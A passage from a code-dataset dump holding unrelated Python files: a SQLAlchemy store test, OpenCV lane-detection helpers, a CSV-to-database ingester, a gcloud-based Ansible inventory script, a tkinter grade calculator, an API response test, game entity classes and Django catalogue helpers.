list(errors)}\n","sub_path":"backend/scrape/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94146756","text":"import os\n\nfrom py2store.stores.sql_w_sqlalchemy import SQLAlchemyTupleStore\nfrom tests.base_test import BaseStoreTest\n\nSQLITE_DB_PATH = 'test.db'\nSQLITE_DB_URI = f'sqlite:///{SQLITE_DB_PATH}'\nSQLITE_TABLE_NAME = 'test_table'\n\n\ndef clean_db_path(path=SQLITE_DB_PATH):\n try:\n os.remove(path)\n except FileNotFoundError:\n pass\n\n\nclass TestSQLAlchemyTupleStore(BaseStoreTest):\n key_dict = {\n 'first_name': 'Yuri',\n 'last_name': 'Gagarin',\n }\n key = tuple(key_dict.values())\n\n data_dict = {\n 'height': '185sm',\n 'weight': '80kg',\n 'is_hero': 'yes he is',\n }\n data = tuple(data_dict.values())\n\n joined_values = {**key_dict, **data_dict}\n\n @classmethod\n def teardown_class(cls):\n clean_db_path()\n\n def test_crud(self):\n store = SQLAlchemyTupleStore(\n db_uri=SQLITE_DB_URI,\n collection_name=SQLITE_TABLE_NAME,\n key_fields=list(self.key_dict.keys()),\n data_fields=list(self.data_dict.keys()),\n )\n\n self._test_create(store)\n self._test_read(store)\n self._test_update(store)\n self._test_delete(store)\n","sub_path":"tests/test_sql_w_sqlalchemy.py","file_name":"test_sql_w_sqlalchemy.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"187305652","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport math\nimport collections\nfrom sklearn import linear_model\n\ndef grayscale(img):\n \"\"\"Applies the Grayscale transform\n This will return an image with only one color channel\n but NOTE: to see the returned image as grayscale\n (assuming your grayscaled image is called 'gray')\n you should call plt.imshow(gray, cmap='gray')\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\ndef canny(img, low_threshold, high_threshold):\n \"\"\"Applies the Canny transform\"\"\"\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n \"\"\"Applies a Gaussian Noise kernel\"\"\"\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n\n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img)\n\n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n #filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\nprevious_frames = collections.deque(maxlen=10)\n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=5):\n \"\"\"\n NOTE: this is the function you might want to use as a starting point once you want to\n average/extrapolate the line segments you detect to map out the full\n extent of the lane (going from the result shown in raw-lines-example.mp4\n to that shown in P1_example.mp4).\n\n Think about things like separating line segments by their\n slope ((y2-y1)/(x2-x1)) to decide which segments are part of the left\n line vs. the right line. Then, you can average the position of each of\n the lines and extrapolate to the top and bottom of the lane.\n\n This function draws `lines` with `color` and `thickness`.\n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n\n m_tresh_horiz = 0.5\n m_tresh_vert = 0.8\n\n m_left = []\n x1_left = []\n x2_left = []\n y1_left = []\n y2_left = []\n\n m_right = []\n x1_right = []\n x2_right = []\n y1_right = []\n y2_right = []\n\n y_max = img.shape[0]\n y_min = int(img.shape[0]*0.59)\n\n XLeft = []\n yLeft = []\n XRight = []\n yRight = []\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n m=(y2-y1)/(x2-x1)\n # remove random horizontal or vertical lines\n if m_tresh_horiz < abs(m) < m_tresh_vert:\n # left line\n if m < 0:\n m_left.append(m)\n x1_left.append(x1)\n x2_left.append(x2)\n y1_left.append(y1)\n y2_left.append(y2)\n XLeft.append(x1)\n XLeft.append(x2)\n yLeft.append(y1)\n yLeft.append(y2)\n # right line\n elif m > 0:\n m_right.append(m)\n x1_right.append(x1)\n x2_right.append(x2)\n y1_right.append(y1)\n y2_right.append(y2)\n XRight.append(x1)\n XRight.append(x2)\n yRight.append(y1)\n yRight.append(y2)\n\n # left\n m_left_median = np.median(m_left)\n x1_left_median = np.median(x1_left)\n x2_left_median = np.median(x2_left)\n y1_left_median = np.median(y1_left)\n y2_left_median = np.median(y2_left)\n\n b_left = y1_left_median - m_left_median * x1_left_median\n\n # right\n m_right_median = np.median(m_right)\n x1_right_median = np.median(x1_right)\n x2_right_median = np.median(x2_right)\n y1_right_median = np.median(y1_right)\n y2_right_median = np.median(y2_right)\n\n #ransac = linear_model.RANSACRegressor()\n #XLeft = np.array(XLeft)\n #yLeft = np.array(yLeft)\n #ransac.fit(XLeft, yLeft)\n\n b_right= y1_right_median - m_right_median * x1_right_median\n\n # Average lines using last 10 frames\n previous_frames.append((m_left_median, b_left, m_right_median, b_right))\n if len(previous_frames) > 0:\n median = np.median(previous_frames, -2)\n m_left = median[0]\n b_left = median[1]\n m_right = median[2]\n b_right = median[3]\n\n x1_left = int((y_max - b_left) / m_left)\n x2_left = int((y_min - b_left) / m_left)\n x1_right = int((y_max - b_right) / m_right)\n x2_right = int((y_min - b_right) / m_right)\n\n # Draw left and right line\n cv2.line(img, (x1_left, y_max), (x2_left, y_min), color, thickness)\n cv2.line(img, (x1_right, y_max), (x2_right, y_min), color, thickness)\n\n #for line in lines:\n # for x1,y1,x2,y2 in line:\n # m=(y2-y1)/(x2-x1)\n # if m_tresh_horiz < abs(m) < m_tresh_vert:\n # cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n\n #imshape = img.shape\n #vertices = np.array([[(int(imshape[1]*0.1), imshape[0]),\n # (int(imshape[1]*0.425), int(imshape[0]*0.61)),\n # (int(imshape[1]*0.595), int(imshape[0]*0.61)),\n # (int(imshape[1]*0.97),imshape[0]),\n # (int(imshape[1]*0.82), imshape[0]),\n # (int(imshape[1]*0.6), int(imshape[0]*0.75)),\n # (int(imshape[1]*0.45), int(imshape[0]*0.75)),\n # (int(imshape[1]*0.25), imshape[0])]],\n # dtype=np.int32)\n #cv2.fillPoly(img, vertices, [0,0,255])\n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n \"\"\"\n `img` should be the output of a Canny transform.\n\n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n\n `initial_img` should be the image before any processing.\n\n The result image is computed as follows:\n\n initial_img * α + img * β + λ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, λ)\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443757489","text":"\"\"\"\nA mechanism to ingest CSV files into a database.\n\nIn morphological profiling experiments, a CellProfiler pipeline is often run in parallel across multiple images and\nproduces a set of CSV files. For example, imaging a 384-well plate, with 9 sites per well, produces 384 * 9 images;\na CellProfiler process may be run on each image, resulting in a 384*9 output directories (each directory typically\ncontains one CSV file per compartment (e.g. Cells.csv, Cytoplasm.csv, Nuclei.csv) and one CSV file for per-image\nmeasurements (e.g. Image.csv).\n\n``cytominer_database.ingest.seed`` can be used to read all these CSV files into a database backend. SQLite is the\nrecommended engine, but ingest will likely also work with PostgreSQL and MySQL.\n\n``cytominer_database.ingest.seed`` assumes a directory structure like shown below:\n\n| plate_a/\n| set_1/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n| set_2/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n| ...\n| set_m/\n| file_1.csv\n| file_2.csv\n| ...\n| file_n.csv\n\nExample::\n\n import cytominer_database.ingest\n\n cytominer_database.ingest.seed(source, target, config)\n\"\"\"\n\nimport os\nimport csv\nimport click\nimport warnings\nimport zlib\n\nimport pandas as pd\nimport backports.tempfile\nimport sqlalchemy.exc\nfrom sqlalchemy import create_engine\n\nimport cytominer_database.utils\n\n\ndef __format__(name, header):\n if header in [\"ImageNumber\", \"ObjectNumber\"]:\n return header\n\n return \"{}_{}\".format(name, header)\n\n\ndef into(input, output, name, identifier, skip_table_prefix=False):\n \"\"\"Ingest a CSV file into a table in a database.\n\n :param input: Input CSV file.\n :param output: Connection string for the database.\n :param name: Table in database into which the CSV file will be ingested\n :param identifier: Unique identifier for ``input``.\n :param skip_table_prefix: True if the prefix of the table name should be excluded\n from the names of columns.\n \"\"\"\n\n with backports.tempfile.TemporaryDirectory() as directory:\n source = os.path.join(directory, os.path.basename(input))\n\n # create a temporary CSV file which is identical to the input CSV file\n # but with the column names prefixed with the name of the compartment\n # (or `Image`, if this is an image CSV file, and `skip_table_prefix` is False)\n with open(input, \"r\") as fin, open(source, \"w\") as fout:\n reader = csv.reader(fin)\n writer = csv.writer(fout)\n\n headers = next(reader)\n if not skip_table_prefix:\n headers = [__format__(name, header) for header in headers]\n\n # The first column is `TableNumber`, which is the unique identifier for the image CSV\n headers = [\"TableNumber\"] + headers\n\n writer.writerow(headers)\n\n [writer.writerow([identifier] + row) for row in reader]\n\n # Now ingest the temp CSV file (with the modified column names) into the database backend\n # the rows of the CSV file are inserted into a table with name `name`.\n with warnings.catch_warnings():\n # Suppress the following warning on Python 3:\n #\n # /usr/local/lib/python3.6/site-packages/odo/utils.py:128: DeprecationWarning: inspect.getargspec() is\n # deprecated, use inspect.signature() or inspect.getfullargspec()\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n\n engine = create_engine(output)\n con = engine.connect()\n\n df = pd.read_csv(source, index_col=0)\n df.to_sql(name=name, con=con, if_exists=\"append\")\n\ndef checksum(pathname, buffer_size=65536):\n \"\"\"\n Generate a 32-bit unique identifier for a file.\n \n :param pathname: input file\n :param buffer_size: buffer size \n \"\"\"\n with open(pathname, \"rb\") as stream:\n result = zlib.crc32(bytes(0))\n\n while True:\n buffer = stream.read(buffer_size)\n\n if not buffer:\n break\n\n result = zlib.crc32(buffer, result)\n\n return result & 0xffffffff\n\ndef seed(source, target, config_file, skip_image_prefix=True):\n \"\"\"\n Read CSV files into a database backend.\n\n :param config_file: Configuration file.\n :param source: Directory containing subdirectories that contain CSV files.\n :param target: Connection string for the database.\n :param skip_image_prefix: True if the prefix of image table name should be excluded\n from the names of columns from per image table\n \"\"\"\n config_file = cytominer_database.utils.read_config(config_file)\n\n # list the subdirectories that contain CSV files\n directories = sorted(list(cytominer_database.utils.find_directories(source)))\n\n for directory in directories:\n\n # get the image CSV and the CSVs for each of the compartments\n try:\n compartments, image = cytominer_database.utils.validate_csv_set(config_file, directory)\n except IOError as e:\n click.echo(e)\n\n continue\n\n # get a unique identifier for the image CSV. This will later be used as the TableNumber column\n # the casting to int is to allow the database to be readable by CellProfiler Analyst, which\n # requires TableNumber to be an integer.\n identifier = checksum(image)\n\n name, _ = os.path.splitext(config_file[\"filenames\"][\"image\"])\n\n # ingest the image CSV\n try:\n into(input=image, output=target, name=name.capitalize(), identifier=identifier,\n skip_table_prefix=skip_image_prefix)\n except sqlalchemy.exc.DatabaseError as e:\n click.echo(e)\n\n continue\n\n # ingest the CSV for each compartment\n for compartment in compartments:\n name, _ = os.path.splitext(os.path.basename(compartment))\n\n into(input=compartment, output=target, name=name.capitalize(), identifier=identifier)\n","sub_path":"cytominer_database/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225557984","text":"#!/usr/bin/python\nimport json\nimport os\nrequest = os.popen(\"gcloud compute instances list | awk '{print $1, $4, $5}'\").read()\n\nip_dict = {\"app\":{}, \"db\":{}}\nfor ip in request.split('\\n')[1:-1]:\n if str(ip.split(' ')[0]).endswith(\"app\"):\n ip_dict[\"app\"][\"hosts\"]=[str(ip.split(' ')[2])]\n else:\n ip_dict[\"db\"][\"hosts\"]=[str(ip.split(' ')[2])]\n ip_dict[\"app\"][\"vars\"]={\"db_host\":str(ip.split(' ')[1])}\n\ndata = ip_dict\n\n\njson_data = json.dumps(data)\nprint(json_data)\n\n\n","sub_path":"ansible/environments/stage/dynamic-inventory.py","file_name":"dynamic-inventory.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"175128570","text":"import tkinter as tk\n\ninterfaz = tk.Tk()\ninterfaz.geometry(\"400x350\")\ninterfaz.title(\"promedio\")\ninterfaz.configure(background= '#26a69a')\nvar=tk.DoubleVar()\n\nc1 = tk.Label(interfaz, text= \"Ingrese Calificación 1\", bg=\"#5c6bc0\", fg=\"white\")\nc1.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn1 = tk.Entry(interfaz)\nn1.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc2 = tk.Label(interfaz, text= \"Ingrese Calificación 2\", bg=\"#5c6bc0\", fg=\"#f5f5f5\")\nc2.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn2 = tk.Entry(interfaz)\nn2.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc3 = tk.Label(interfaz, text= \"Ingrese Calificación 3\", bg=\"#5c6bc0\", fg=\"#f5f5f5\")\nc3.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn3 = tk.Entry(interfaz)\nn3.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc4 = tk.Label(interfaz, text= \"Ingrese Nota Examen final\", bg=\"#5c6bc0\", fg=\"white\")\nc4.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn4 = tk.Entry(interfaz)\nn4.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\nc5 = tk.Label(interfaz, text= \"Ingrese Nota trabajo final\", bg=\"#5c6bc0\", fg=\"white\")\nc5.pack(padx=5, pady=4, ipadx=5, ipady=5, fill=tk.X)\nn5 = tk.Entry(interfaz)\nn5.pack(padx=5, pady=5, ipadx=5, ipady=5, fill=tk.X)\n\n\ndef promedio():\n c1 = float(n1.get()) + float(n2.get()) + float(n3.get())\n c1 = c1 / 3 * float(0.55)\n c4 = float(n4.get()) * float(0.30)\n c5 = float(n5.get()) * float(0.15)\n cf = c1 + c4 + c5\n\n return var.set(cf)\n\nresultado= tk.Label(interfaz, textvariable = var, padx = 5, pady= 5, width = 50)\nresultado.pack()\nboton1 = tk.Button(interfaz, text= \"Resultado\", bg = \"#ef5350\", command = promedio)\nboton1.pack(side= tk.TOP)\n\ninterfaz.mainloop()","sub_path":"punto4.py","file_name":"punto4.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65725844","text":"# Validating response status codes and headers using response object\n\nimport requests\n\nbaseUrl = 'http://216.10.245.166/Library/GetBook.php'\nresponse2 = requests.get(baseUrl, params={'AuthorName': 'Tester'},)\n# print('Response status code is: \\t', response2)\nprint('Response status code is: \\t', response2.status_code) # checking status code\nassert response2.status_code == 200 # asserting status code as 200\nresponse2Header = response2.headers # storing response headers.\nprint('Response headers are: \\n', response2Header) # printing response headers\n\n# validating 'Content-Type' header is 'application/json;charset=UTF-8'\nassert response2Header['Content-Type'] == 'application/json;charset=UTF-8' # asserting for required value\nif response2Header['Content-Type'] == 'application/json;charset=UTF-8':\n print('Content-Type is: \\n', response2Header['Content-Type'])\nelse:\n print('Content-Type is not as expected')\n\n# response cookies\nprint('Response cookies are: \\n', response2.cookies)\n\n# Retrieve the book details for isbn = tretrer i.e match isbn and then print complete book details.\nresponse2Json = response2.json()\nprint('Search response data:\\t', response2Json)\nlengthOfResponse2Json = len(response2Json)\ndataResponse2 = {}\nfor actualBook in range(lengthOfResponse2Json): # iterating through the list\n dataResponse2 = response2Json[actualBook] # storing element in each iteration to a variable\n if dataResponse2['isbn'] == 'tretrer': # evaluating condition\n print(dataResponse2) # printing resultant book details\n break\nexpectedBook = {\n \"book_name\": \"ocean\",\n \"isbn\": \"tretrer\",\n \"aisle\": \"333\"\n }\nassert expectedBook == dataResponse2 # asserting for expected book details\n","sub_path":"pythonBasics/tests/2apiValidation.py","file_name":"2apiValidation.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28683820","text":"# ------------ Math ------------------------------------------------------------------------------------ #\r\nclass Vector:\r\n\tdef __init__(self, x, y):\r\n\t\tself.x = x\r\n\t\tself.y = y\r\n\tdef __str__(self):\r\n\t\treturn \"%0.2f %0.2f\" % (self.x, self.y)\r\n\tdef setMagnitude(self, mag):\r\n\t\tif mag == 0:\r\n\t\t\tself.x = 0\r\n\t\t\tself.y = 0\r\n\t\telse: ## This does not work when the values for x and y are both 0\r\n\t\t\tself.x, self.y = self.x/float((self.x**2+self.y**2)**0.5)*mag,self.y/float((self.x**2+self.y**2)**0.5)*mag\r\n\tdef getMagnitude(self):\r\n\t\treturn ((self.x)**2+(self.y)**2)**0.5\r\n\tdef add(self, vector):\r\n\t\tself.x += vector.x\r\n\t\tself.y += vector.y\r\n\tdef distance(self, vector):\r\n\t\treturn ((self.x-vector.x)**2+(self.y-vector.y)**2)**0.5\r\n\tdef negative(self):\r\n\t\treturn Vector(-self.x, -self.y)\r\n\tdef copy(self):\r\n\t\treturn Vector(-(-self.x),-(-self.y))\r\n\tdef sin(self):\r\n\t\ttry:\r\n\t\t\treturn self.y/self.getMagnitude()\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef cos(self):\r\n\t\ttry:\r\n\t\t\treturn self.x/self.getMagnitude()\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef tan(self):\r\n\t\ttry:\r\n\t\t\treturn self.y/self.x\r\n\t\texcept:\r\n\t\t\treturn None\r\n\tdef delta(self, vector):\r\n\t\treturn Vector(-self.x+vector.x, -self.y+vector.y)\r\n\tdef scale(self, scalar_multiple):\r\n\t\treturn Vector(self.x*scalar_multiple,self.y*scalar_multiple)\r\n\r\n# ------------ Entities -------------------------------------------------------------------------------- #\r\nclass Entity:\r\n\tdef __init__(self, id, position, direction, speed, moving, animations = None):\r\n\t\tself.id = id\r\n\t\tself.position = position\r\n\t\tself.direction = direction\r\n\t\tself.speed = speed\r\n\t\tself.moving = moving\r\n\t\tself.animations = animations\r\n\t\t\r\n\t\tself.shad_size = (20,14)\r\n\t\tself.velocity = Vector(0,0)\r\n\t\tself.fixAnim = False\r\n\t\tself.__fix__()\r\n\tdef __dict__(self):\r\n\t\treturn {'id':self.id, 'position':self.position, 'direction':self.direciton,'speed':self.direction}\r\n\tdef __fix__(self):\r\n\t\t#print self.get()\r\n\t\tif self.moving:\r\n\t\t\tif self.direction == 7 or self.direction == 0 or self.direction == 1:\r\n\t\t\t\tself.velocity.y = -1\r\n\t\t\telif self.direction == 3 or self.direction == 4 or self.direction == 5:\r\n\t\t\t\tself.velocity.y = 1\r\n\t\t\telse:\r\n\t\t\t\tself.velocity.y = 0\r\n\t\t\tif self.direction == 5 or self.direction == 6 or self.direction == 7:\r\n\t\t\t\tself.velocity.x = -1\r\n\t\t\telif self.direction == 1 or self.direction == 2 or self.direction == 3:\r\n\t\t\t\tself.velocity.x = 1\r\n\t\t\telse:\r\n\t\t\t\tself.velocity.x = 0\r\n\t\t\t#print self.velocity\r\n\t\t\tself.velocity.setMagnitude(self.speed)\r\n\t\t\t#print self.velocity\r\n\t\t\tif self.animations and self.fixAnim:\r\n\t\t\t\tself.fixAnim = False\r\n\t\t\t\t#print 'resetting'\r\n\t\t\t\tself.animations[self.direction].reset()\r\n\t\telse:\r\n\t\t\tself.velocity.setMagnitude(0)\r\n\t\t\tif self.animations and self.fixAnim:\r\n\t\t\t\tself.fixAnim = False\r\n\t\t\t\t#print 'resetting'\r\n\t\t\t\tself.animations[self.direction+8].reset()\r\n\tdef setDirection(self,direction):\r\n\t\tif direction != self.direction:\r\n\t\t\tself.direction = direction\r\n\t\t\tself.__fix__()\r\n\t\t\tself.fixAnim = True\r\n\t\t\treturn True\r\n\tdef setMoving(self, moving):\r\n\t\tif self.moving != moving:\r\n\t\t\t#print moving\r\n\t\t\tself.moving = moving\r\n\t\t\tself.__fix__()\r\n\t\t\tself.fixAnim = True\r\n\t\t\treturn True\r\n\tdef setSpeed(self, speed):\r\n\t\tself.speed = speed\r\n\t\tself.__fix__()\r\n\tdef update(self, delta):\r\n\t\tself.position.add(self.velocity.scale(delta))\r\n\t\t#if not self.moving:\r\n\t\t#\tprint self.id, 'can\\'t move\\t', self.velocity\r\n\t\t#else:\r\n\t\t#\tprint self.id, 'can move\\t', self.velocity\r\n\t\tif self.animations:\r\n\t\t\tif self.moving:\r\n\t\t\t\tself.animations[self.direction].update(delta)\r\n\t\t\telse:\r\n\t\t\t\tself.animations[self.direction + 8].update(delta)\r\n\tdef get(self):\r\n\t\t#print self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving\r\n\t\treturn 'E%s %0.0f %0.0f %d %d %d' % (self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving)\r\n\tdef getImage(self):\r\n\t\t#print repr(self.moving), self.direction\r\n\t\tif self.moving:\r\n\t\t\treturn self.animations[self.direction].getImage()\r\n\t\telse:\r\n\t\t\treturn self.animations[self.direction + 8].getImage()\r\n\tdef getShadow(self):\r\n\t\ts = pygame.Surface(self.shad_size,pygame.SRCALPHA)\r\n\t\tpygame.draw.ellipse(s, (10,10,20),(0,0,self.shad_size[0],self.shad_size[1]))\r\n\t\treturn s\r\nclass Character(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, name, skin, hair, equipment, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.name = name\r\n\t\tself.skin = skin\r\n\t\tself.hair = hair\r\n\t\tself.equipment = equipment\r\n\tdef getChar(self):\r\n\t\treturn 'C%s %0.0f %0.0f %d %d %d %s' % (self.id,self.position.x,self.position.y,self.direction,self.speed, self.moving, self.name)\r\nclass Mob(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, name, type, level, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.name = name\r\n\t\tself.type = type\r\n\t\tself.level = level\r\nclass Item(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, item_number, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.item_number = item_number\r\nclass Projectile(Entity):\r\n\tdef __init__(self, id, position, direction, speed, moving, projectile_number, animations = None):\r\n\t\tEntity.__init__(self, id, position, direction, speed, moving, animations)\r\n\t\tself.projectile_number = projectile_number\r\n\r\n\t\t\r\nclass Chunk:\r\n\tdef __init__(self, location,byte_array_a = None,byte_array_b = None):\r\n\t\tself.location = location\r\n\t\tself.byte_array_a = byte_array_a\r\n\t\tself.byte_array_b = byte_array_b\r\n\t\tself.floor = []\r\n\t\tself.environment = []\r\n\t\tself.floor_image = None\r\n\t\tself.rows = []\r\n\t\tself.loaded = False\r\n\t\tself.block_width = 32\r\n\t\tself.chunk_width = 0\r\n\t\tif self.byte_array_a:\r\n\t\t\tself.buildFloor()\r\n\t\tif self.byte_array_b:\r\n\t\t\tself.buildEnv()\r\n\t\ttemp = self.location.split('_')\r\n\t\ttemp = (int(temp[0]), int(temp[1]))\r\n\t\tself.x = temp[0] * 32 * self.chunk_width\r\n\t\tself.y = temp[1] * 32 * self.chunk_width\r\n\tdef buildFloor(self):\r\n\t\tself.chunk_width = int(len(self.byte_array_a) ** 0.5)\r\n\t\tfor i in range(self.chunk_width):\r\n\t\t\tself.floor.append(self.byte_array_a[i*self.chunk_width:(i+1)*self.chunk_width])\r\n\tdef buildEnv(self):\r\n\t\tsize = int(len(self.byte_array_b) ** 0.5)\r\n\t\tfor i in range(size):\r\n\t\t\tself.environment.append(self.byte_array_b[i*size:(i+1)*size])\r\n\tdef getFloor(self):\r\n#\t\tprint len(self.byte_array_a)\r\n\t\treturn 'mf%s %s' % (self.location, self.byte_array_a)\r\n\tdef setFloor(self, byte_array):\r\n\t\tself.byte_array_a = byte_array\r\n\t\tself.buildFloor()\r\n\tdef getEnvironment(self):\r\n\t\treturn 'me%s %s' % (self.location, self.byte_array_b)\r\n\tdef setEnvironment(self, byte_array):\r\n\t\tself.byte_array_b = byte_array\r\n\t\tself.buildEnv()\r\n\r\nclass Map:\r\n\tdef __init__(self, size):\r\n\t\tself.size = size\r\n\t\tself.folder_location = 'Map'\r\n\t\tself.chunks = {}\r\n\t\tself.loadMap()\r\n\tdef loadMap(self):\r\n\t\tfor i in range(self.size):\r\n\t\t\tfor j in range(self.size):\r\n\t\t\t\tfile = open('%s/Floor/%d_%d.SAM' % (self.folder_location, i-self.size/2, j-self.size/2), 'rb')\r\n\t\t\t\tbyte_array_a = file.read()\r\n\t\t\t\tfile.close()\r\n\t\t\t\tfile = open('%s/Env/%d_%dE.SAM' % (self.folder_location, i-self.size/2, j-self.size/2), 'rb')\r\n\t\t\t\tbyte_array_b = file.read()\r\n\t\t\t\tfile.close()\r\n\t\t\t\tself.chunks['%d_%d' % (i-self.size/2, j-self.size/2)] = Chunk('%d_%d' % (i-self.size/2, j-self.size/2), byte_array_a, byte_array_b)\r\n","sub_path":"Server/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"423481791","text":"# State machine constants for the StateMachine class below\nSTATE_INTRO = 1\nSTATE_MENU = 2\nSTATE_HELP = 3\nSTATE_ABOUT = 4\nSTATE_PLAY = 5\n\nclass StateMachine(object):\n \"\"\"\n Manages a stack based state machine.\n peek(), pop() and push() perform as traditionally expected.\n peeking and popping an empty stack returns None.\n \"\"\"\n \n def __init__ (self):\n self.statestack = []\n \n def peek(self):\n \"\"\"\n Returns the current state without altering the stack.\n Returns None if the stack is empty.\n \"\"\"\n try:\n return self.statestack[-1]\n except IndexError:\n # empty stack\n return None\n \n def pop(self):\n \"\"\"\n Returns the current state and remove it from the stack.\n Returns None if the stack is empty.\n \"\"\"\n try:\n self.statestack.pop()\n return len(self.statestack) > 0\n except IndexError:\n # empty stack\n return None\n \n def push(self, state):\n \"\"\"\n Push a new state onto the stack.\n Returns the pushed value.\n \"\"\"\n self.statestack.append(state)\n return state\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88350087","text":"# import os,sys\n# import django\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'meiduo_mall.settings.dev')\n# sys.path.insert(0, '/home/ubuntu/Desktop/meiMall/meiduo_mall')\n# django.setup()\n\n\nfrom django.template import loader\nfrom django.conf import settings\nfrom apps.goods.models import GoodsChannel,\\\n GoodsCategory,SKU,SKUImage,SKUSpecification,GoodsSpecification,SpecificationOption\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\n\ndef get_breadcrumb(category):\n\n dict = {\n 'cat1':'',\n 'cat2':'',\n 'cat3':'',\n }\n\n if category.parent is None:\n dict['cat1'] = category.name\n\n\n elif category.parent.parent is None:\n dict['cat2'] = category.name\n dict['cat1'] = category.parent.name\n\n elif category.parent.parent.parent is None:\n dict['cat3'] = category.name\n dict['cat2'] = category.parent.name\n dict['cat1'] = category.parent.parent.name\n\n return dict\n\n\ndef get_categories():\n\n categories = OrderedDict()\n\n channels = GoodsChannel.objects.order_by(\n 'group_id',\n 'sequence'\n )\n\n for channel in channels:\n # 如果是第一次遍历到该分组,则为该分组添加一个新的key(该key即为group_id)\n if channel.group_id not in categories:\n categories[channel.group_id] = {\n 'channels': [],\n 'sub_cats': []\n }\n\n # 构建当前分组的频道和分类信息\n cat1 = channel.category\n categories[channel.group_id]['channels'].append({\n 'id': cat1.id,\n 'name': cat1.name,\n 'url': channel.url\n })\n\n # 所有父级分类是cat1这个1级分类的2级分类\n cat2s = GoodsCategory.objects.filter(\n parent=cat1 #\n )\n\n for cat2 in cat2s:\n cat3_list = [] # 根据cat2这个2级分类获取3级分类\n\n cat3s = GoodsCategory.objects.filter(\n parent=cat2\n )\n\n for cat3 in cat3s:\n cat3_list.append({\n 'id': cat3.id,\n 'name': cat3.name\n })\n\n categories[channel.group_id]['sub_cats'].append({\n 'id': cat2.id,\n 'name': cat2.name,\n 'sub_cats': cat3_list # 填充三级分类\n })\n return categories\n\n\n\ndef get_goods_and_spec(sku_id):\n\n sku = SKU.objects.get(pk=sku_id)\n # 记录当前sku的选项组合\n cur_sku_spec_options = 